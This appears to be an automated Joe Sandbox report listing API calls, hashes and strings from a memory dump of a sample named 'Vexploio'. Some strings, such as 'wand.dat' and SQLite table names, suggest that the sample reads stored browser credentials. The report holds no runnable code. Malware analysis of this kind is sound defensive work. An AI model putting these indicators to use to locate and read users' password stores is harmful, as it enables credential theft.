                              • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                              • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memcmp
                              • String ID:
                              • API String ID: 3384217055-0
                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$memcpy
                              • String ID:
                              • API String ID: 368790112-0
                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                              APIs
                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                              • GetMenu.USER32(?), ref: 00410F8D
                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                              • String ID:
                              • API String ID: 1889144086-0
                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                              APIs
                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                              • GetLastError.KERNEL32 ref: 0041810A
                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastMappingView
                              • String ID:
                              • API String ID: 1661045500-0
                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                              APIs
                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                              • memcpy.MSVCRT ref: 0042EC7A
                              Strings
                              • sqlite_altertab_%s, xrefs: 0042EC4C
                              • virtual tables may not be altered, xrefs: 0042EBD2
                              • Cannot add a column to a view, xrefs: 0042EBE8
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpymemset
                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                              • API String ID: 1297977491-2063813899
                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                              APIs
                              • memset.MSVCRT ref: 0040560C
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                              • String ID: *.*$dat$wand.dat
                              • API String ID: 2618321458-1828844352
                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                              APIs
                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                              • wcslen.MSVCRT ref: 00410C74
                              • _wtoi.MSVCRT ref: 00410C80
                              • _wcsicmp.MSVCRT ref: 00410CCE
                              • _wcsicmp.MSVCRT ref: 00410CDF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                              • String ID:
                              • API String ID: 1549203181-0
                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                              APIs
                              • memset.MSVCRT ref: 00412057
                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                              • GetKeyState.USER32(00000010), ref: 0041210D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                              • String ID:
                              • API String ID: 3550944819-0
                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                              APIs
                              • wcslen.MSVCRT ref: 0040A8E2
                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • memcpy.MSVCRT ref: 0040A94F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$memcpy$mallocwcslen
                              • String ID:
                              • API String ID: 3023356884-0
                              • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                              • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                              APIs
                              • wcslen.MSVCRT ref: 0040B1DE
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                              • memcpy.MSVCRT ref: 0040B248
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$memcpy$mallocwcslen
                              • String ID:
                              • API String ID: 3023356884-0
                              • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                              • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: @
                              • API String ID: 3510742995-2766056989
                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@memcpymemset
                              • String ID:
                              • API String ID: 1865533344-0
                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                              APIs
                              • strlen.MSVCRT ref: 0040B0D8
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                              • memcpy.MSVCRT ref: 0040B159
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$memcpy$mallocstrlen
                              • String ID:
                              • API String ID: 1171893557-0
                              • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                              • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                              APIs
                              • memset.MSVCRT ref: 004144E7
                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                              • memset.MSVCRT ref: 0041451A
                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                              • String ID:
                              • API String ID: 1127616056-0
                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memset
                              • String ID: sqlite_master
                              • API String ID: 438689982-3163232059
                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                              APIs
                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                              • wcscpy.MSVCRT ref: 00414DF3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: BrowseFolderFromListMallocPathwcscpy
                              • String ID:
                              • API String ID: 3917621476-0
                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                              APIs
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                              • _snwprintf.MSVCRT ref: 00410FE1
                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                              • _snwprintf.MSVCRT ref: 0041100C
                              • wcscat.MSVCRT ref: 0041101F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                              • String ID:
                              • API String ID: 822687973-0
                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7618DF80,?,0041755F,?), ref: 00417452
                              • malloc.MSVCRT ref: 00417459
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7618DF80,?,0041755F,?), ref: 00417478
                              • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$??3@malloc
                              • String ID:
                              • API String ID: 4284152360-0
                              • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                              • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                              • RegisterClassW.USER32(00000001), ref: 00412428
                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: HandleModule$ClassCreateRegisterWindow
                              • String ID:
                              • API String ID: 2678498856-0
                              • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                              • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                              APIs
                              • GetDlgItem.USER32(?,?), ref: 00409B40
                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MessageSend$Item
                              • String ID:
                              • API String ID: 3888421826-0
                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                              APIs
                              • memset.MSVCRT ref: 00417B7B
                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                              • GetLastError.KERNEL32 ref: 00417BB5
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$ErrorLastLockUnlockmemset
                              • String ID:
                              • API String ID: 3727323765-0
